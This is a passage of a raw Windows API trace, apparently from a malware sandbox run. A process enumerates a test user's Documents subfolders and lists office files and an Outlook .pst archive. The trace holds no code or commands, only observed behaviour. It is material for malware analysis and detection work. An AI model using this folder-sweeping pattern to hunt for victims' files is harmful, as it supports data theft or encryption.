ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x1b446770, ftLastWriteTime.dwHighDateTime=0x1d4c988, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png", cAlternateFileName="")) returned 0 [0056.416] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b5f0 | out: hHeap=0x660000) returned 1 [0056.416] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.416] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0056.416] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0056.416] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.416] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.416] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.416] PathFindFileNameW (pszPath="") returned="" [0056.416] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x1b446770, ftLastWriteTime.dwHighDateTime=0x1d4c988, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png", cAlternateFileName="")) returned 0xffffffff [0056.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269658 | out: hHeap=0x660000) returned 1 [0056.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0056.416] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.416] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0056.417] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0056.417] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.417] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.417] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.417] PathFindFileNameW (pszPath="") returned="" [0056.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x1b446770, ftLastWriteTime.dwHighDateTime=0x1d4c988, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png", cAlternateFileName="")) returned 0xffffffff [0056.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269658 | out: hHeap=0x660000) returned 1 [0056.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0056.417] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.417] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0056.417] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0056.417] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.417] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.417] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.417] PathFindFileNameW (pszPath="") returned="" [0056.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269658 | out: hHeap=0x660000) returned 1 [0056.418] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.418] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.418] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0056.418] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0056.418] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0056.419] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0056.419] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0056.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0056.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.419] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.419] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.419] PathFindFileNameW (pszPath="") returned="" [0056.419] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0056.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0056.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.419] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0056.419] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0056.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0056.419] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.419] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.420] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.420] PathFindFileNameW (pszPath="") returned="" [0056.420] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0056.420] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.420] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0056.420] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0056.420] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0056.420] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.420] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\") returned="R4I1Q ij0VYYLZ2qE\\" [0056.420] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0056.420] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.420] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.421] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.421] PathFindFileNameW (pszPath="") returned="" [0056.421] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x519769b0, ftLastAccessTime.dwHighDateTime=0x1d4cf39, ftLastWriteTime.dwLowDateTime=0x519769b0, ftLastWriteTime.dwHighDateTime=0x1d4cf39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7fb0 | out: hHeap=0x660000) returned 1 [0056.421] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x519769b0, ftLastAccessTime.dwHighDateTime=0x1d4cf39, ftLastWriteTime.dwLowDateTime=0x519769b0, ftLastWriteTime.dwHighDateTime=0x1d4cf39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.421] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5191130, ftCreationTime.dwHighDateTime=0x1d4ce88, ftLastAccessTime.dwLowDateTime=0x2660a3c0, ftLastAccessTime.dwHighDateTime=0x1d4c830, ftLastWriteTime.dwLowDateTime=0x2660a3c0, ftLastWriteTime.dwHighDateTime=0x1d4c830, nFileSizeHigh=0x0, nFileSizeLow=0x563f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="97eCjaiIhB-aD14f.odt", cAlternateFileName="97ECJA~1.ODT")) returned 1 [0056.421] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x403bc420, ftCreationTime.dwHighDateTime=0x1d4c829, ftLastAccessTime.dwLowDateTime=0x3a1324c0, ftLastAccessTime.dwHighDateTime=0x1d4d59a, ftLastWriteTime.dwLowDateTime=0x3a1324c0, ftLastWriteTime.dwHighDateTime=0x1d4d59a, nFileSizeHigh=0x0, nFileSizeLow=0x183d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TTeO3-kFVQDhs.ppt", cAlternateFileName="TTEO3-~1.PPT")) returned 1 [0056.421] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d2dde0, ftCreationTime.dwHighDateTime=0x1d4ce9a, ftLastAccessTime.dwLowDateTime=0xebf36fc0, ftLastAccessTime.dwHighDateTime=0x1d4c89c, ftLastWriteTime.dwLowDateTime=0xebf36fc0, ftLastWriteTime.dwHighDateTime=0x1d4c89c, nFileSizeHigh=0x0, nFileSizeLow=0x1727b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VzHk HXQOnf5.odp", cAlternateFileName="VZHKHX~1.ODP")) returned 1 [0056.421] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d2dde0, ftCreationTime.dwHighDateTime=0x1d4ce9a, ftLastAccessTime.dwLowDateTime=0xebf36fc0, ftLastAccessTime.dwHighDateTime=0x1d4c89c, ftLastWriteTime.dwLowDateTime=0xebf36fc0, ftLastWriteTime.dwHighDateTime=0x1d4c89c, nFileSizeHigh=0x0, nFileSizeLow=0x1727b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VzHk HXQOnf5.odp", cAlternateFileName="VZHKHX~1.ODP")) returned 0 [0056.421] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0056.421] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\") returned="xw_W- RtiM1Q0r\\" [0056.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0056.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.421] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.421] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.421] PathFindFileNameW (pszPath="") returned="" [0056.421] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x88c5d230, ftLastAccessTime.dwHighDateTime=0x1d4cbb2, ftLastWriteTime.dwLowDateTime=0x88c5d230, ftLastWriteTime.dwHighDateTime=0x1d4cbb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x88c5d230, ftLastAccessTime.dwHighDateTime=0x1d4cbb2, ftLastWriteTime.dwLowDateTime=0x88c5d230, ftLastWriteTime.dwHighDateTime=0x1d4cbb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d47720, ftCreationTime.dwHighDateTime=0x1d4cafa, ftLastAccessTime.dwLowDateTime=0x8164ae70, ftLastAccessTime.dwHighDateTime=0x1d4d1b2, ftLastWriteTime.dwLowDateTime=0x8164ae70, ftLastWriteTime.dwHighDateTime=0x1d4d1b2, nFileSizeHigh=0x0, nFileSizeLow=0xd956, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1y8uVRiNT7yn.odp", cAlternateFileName="1Y8UVR~1.ODP")) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75a4add0, ftCreationTime.dwHighDateTime=0x1d4ca53, ftLastAccessTime.dwLowDateTime=0x66439a30, ftLastAccessTime.dwHighDateTime=0x1d4d422, ftLastWriteTime.dwLowDateTime=0x66439a30, ftLastWriteTime.dwHighDateTime=0x1d4d422, nFileSizeHigh=0x0, nFileSizeLow=0xb2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ERvgLja.ots", cAlternateFileName="")) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f72bfd0, ftCreationTime.dwHighDateTime=0x1d4cdfe, ftLastAccessTime.dwLowDateTime=0x8cb61f70, ftLastAccessTime.dwHighDateTime=0x1d4cff5, ftLastWriteTime.dwLowDateTime=0x8cb61f70, ftLastWriteTime.dwHighDateTime=0x1d4cff5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mw2tK3t ch7R6yApjv", cAlternateFileName="MW2TK3~1")) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63e41430, ftCreationTime.dwHighDateTime=0x1d4caff, ftLastAccessTime.dwLowDateTime=0xa3eb90b0, ftLastAccessTime.dwHighDateTime=0x1d4cd7c, ftLastWriteTime.dwLowDateTime=0xa3eb90b0, ftLastWriteTime.dwHighDateTime=0x1d4cd7c, nFileSizeHigh=0x0, nFileSizeLow=0x16b54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nqPYpTIV1l.doc", cAlternateFileName="NQPYPT~1.DOC")) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b33ed90, ftCreationTime.dwHighDateTime=0x1d4d2f4, ftLastAccessTime.dwLowDateTime=0xb4c43010, ftLastAccessTime.dwHighDateTime=0x1d4c906, ftLastWriteTime.dwLowDateTime=0xb4c43010, ftLastWriteTime.dwHighDateTime=0x1d4c906, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pW62l8V1WmQv", cAlternateFileName="PW62L8~1")) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a225a30, ftCreationTime.dwHighDateTime=0x1d4c844, ftLastAccessTime.dwLowDateTime=0x6b59fcd0, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0x6b59fcd0, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x15b11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qsrLr5Sl.csv", cAlternateFileName="")) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68462f60, ftCreationTime.dwHighDateTime=0x1d4c6d9, ftLastAccessTime.dwLowDateTime=0xfbb4e9a0, ftLastAccessTime.dwHighDateTime=0x1d4ce75, ftLastWriteTime.dwLowDateTime=0xfbb4e9a0, ftLastWriteTime.dwHighDateTime=0x1d4ce75, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tdc1X rXuBGflZJUC.xls", cAlternateFileName="TDC1XR~1.XLS")) returned 1 [0056.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5ae690, ftCreationTime.dwHighDateTime=0x1d4c94a, ftLastAccessTime.dwLowDateTime=0x744b50f0, ftLastAccessTime.dwHighDateTime=0x1d4d049, ftLastWriteTime.dwLowDateTime=0x744b50f0, ftLastWriteTime.dwHighDateTime=0x1d4d049, nFileSizeHigh=0x0, nFileSizeLow=0x18ef7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wdJqAyQOW.ots", cAlternateFileName="WDJQAY~1.OTS")) returned 1 [0056.422] FindNextFileW (in: 